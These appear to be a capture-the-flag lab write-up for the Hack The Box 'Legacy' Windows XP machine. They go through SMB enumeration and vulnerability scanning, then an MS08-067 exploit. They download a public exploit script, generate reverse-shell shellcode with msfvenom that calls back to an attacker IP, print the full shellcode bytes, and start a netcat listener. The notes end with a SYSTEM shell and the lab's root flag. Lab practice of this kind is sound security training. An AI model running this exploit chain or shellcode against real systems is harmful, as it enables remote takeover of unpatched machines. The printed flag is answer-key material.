let's enumerate first
command: sudo rustscan -a 10.10.10.4
result:
PORT    STATE SERVICE      REASON
135/tcp open  msrpc        syn-ack ttl 127
139/tcp open  netbios-ssn  syn-ack ttl 127
445/tcp open  microsoft-ds syn-ack ttl 127

command: sudo nmap -sSVC -A -p 135,139,445 10.10.10.4
result:
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|media device|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|PocketPC/CE (96%), Microsoft Windows Mobile 5.X|6.X (90%), Microsoft embedded (90%), ARCA embedded (90%), Neopost embedded (90%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_mobile:5 cpe:/o:microsoft:windows_mobile:6 cpe:/o:microsoft:windows_ce cpe:/h:arca:cm18 cpe:/o:microsoft:windows_ce:5.0
Aggressive OS guesses: Microsoft Windows XP SP3 (96%), Microsoft Windows XP SP2 or SP3 (94%), Microsoft Windows Server 2003 SP1 (93%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (93%), Microsoft Windows XP SP2 (92%), Microsoft Windows XP SP2 - SP3 (92%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2000 SP1 (92%), Microsoft Windows XP Professional SP2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b9e6e7 (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2023-07-10T18:23:52+03:00
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

command: smbmap -H 10.10.10.4                        
[+] IP: 10.10.10.4:445	Name: 10.10.10.4  

command: smbclient -N -L //10.10.10.4
protocol negotiation failed: NT_STATUS_IO_TIMEOUT

command: ls /usr/share/nmap/scripts/ | grep smb | grep vuln
smb2-vuln-uptime.nse
smb-vuln-conficker.nse
smb-vuln-cve2009-3103.nse
smb-vuln-cve-2017-7494.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-ms10-061.nse
smb-vuln-ms17-010.nse
smb-vuln-regsvc-dos.nse
smb-vuln-webexec.nse

command: nmap --script smb-vuln* -p 445 -oA smb_vulns 10.10.10.4 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 20:30 WIB
Nmap scan report for 10.10.10.4
Host is up (0.074s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 5.97 seconds

MS-08-067 exploit
get exploit from here: https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
command: wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py

command: msfvenom -p windows/shell_reverse_tcp LHOSt=10.10.16.19 LPORT=7979 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

change shellcode to this:
shellcode = ""
shellcode +="\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0"
shellcode +="\x5e\x81\x76\x0e\x43\x97\xaa\xb0\x83\xee\xfc"
shellcode +="\xe2\xf4\xbf\x7f\x28\xb0\x43\x97\xca\x39\xa6"
shellcode +="\xa6\x6a\xd4\xc8\xc7\x9a\x3b\x11\x9b\x21\xe2"
shellcode +="\x57\x1c\xd8\x98\x4c\x20\xe0\x96\x72\x68\x06"
shellcode +="\x8c\x22\xeb\xa8\x9c\x63\x56\x65\xbd\x42\x50"
shellcode +="\x48\x42\x11\xc0\x21\xe2\x53\x1c\xe0\x8c\xc8"
shellcode +="\xdb\xbb\xc8\xa0\xdf\xab\x61\x12\x1c\xf3\x90"
shellcode +="\x42\x44\x21\xf9\x5b\x74\x90\xf9\xc8\xa3\x21"
shellcode +="\xb1\x95\xa6\x55\x1c\x82\x58\xa7\xb1\x84\xaf"
shellcode +="\x4a\xc5\xb5\x94\xd7\x48\x78\xea\x8e\xc5\xa7"
shellcode +="\xcf\x21\xe8\x67\x96\x79\xd6\xc8\x9b\xe1\x3b"
shellcode +="\x1b\x8b\xab\x63\xc8\x93\x21\xb1\x93\x1e\xee"
shellcode +="\x94\x67\xcc\xf1\xd1\x1a\xcd\xfb\x4f\xa3\xc8"
shellcode +="\xf5\xea\xc8\x85\x41\x3d\x1e\xff\x99\x82\x43"
shellcode +="\x97\xc2\xc7\x30\xa5\xf5\xe4\x2b\xdb\xdd\x96"
shellcode +="\x44\x68\x7f\x08\xd3\x96\xaa\xb0\x6a\x53\xfe"
shellcode +="\xe0\x2b\xbe\x2a\xdb\x43\x68\x7f\xe0\x13\xc7"
shellcode +="\xfa\xf0\x13\xd7\xfa\xd8\xa9\x98\x75\x50\xbc"
shellcode +="\x42\x3d\xda\x46\xff\xa0\xba\x53\x84\xc2\xb2"
shellcode +="\x43\x88\x81\x39\xa5\xfd\xba\xe6\x14\xff\x33"
shellcode +="\x15\x37\xf6\x55\x65\xc6\x57\xde\xbc\xbc\xd9"
shellcode +="\xa2\xc5\xaf\xff\x5a\x05\xe1\xc1\x55\x65\x2b"
shellcode +="\xf4\xc7\xd4\x43\x1e\x49\xe7\x14\xc0\x9b\x46"
shellcode +="\x29\x85\xf3\xe6\xa1\x6a\xcc\x77\x07\xb3\x96"
shellcode +="\xb1\x42\x1a\xee\x94\x53\x51\xaa\xf4\x17\xc7"
shellcode +="\xfc\xe6\x15\xd1\xfc\xfe\x15\xc1\xf9\xe6\x2b"
shellcode +="\xee\x66\x8f\xc5\x68\x7f\x39\xa3\xd9\xfc\xf6"
shellcode +="\xbc\xa7\xc2\xb8\xc4\x8a\xca\x4f\x96\x2c\x4a"
shellcode +="\xad\x69\x9d\xc2\x16\xd6\x2a\x37\x4f\x96\xab"
shellcode +="\xac\xcc\x49\x17\x51\x50\x36\x92\x11\xf7\x50"
shellcode +="\xe5\xc5\xda\x43\xc4\x55\x65"

target windows version likely Running (JUST GUESSING): Microsoft Windows XP|2003|2000|PocketPC/CE (96%)
choose 6

command: nc -lvnp 7979
command: python3 ms08-067.py 10.10.10.4 6 445
result:
C:\WINDOWS\system32> 

go to root.txt
C:\Documents and Settings\Administrator\Desktop>type root.txt
993442d258b0e0ec917cae9e695d5713

resource: https://0xdf.gitlab.io/2019/02/21/htb-legacy.html
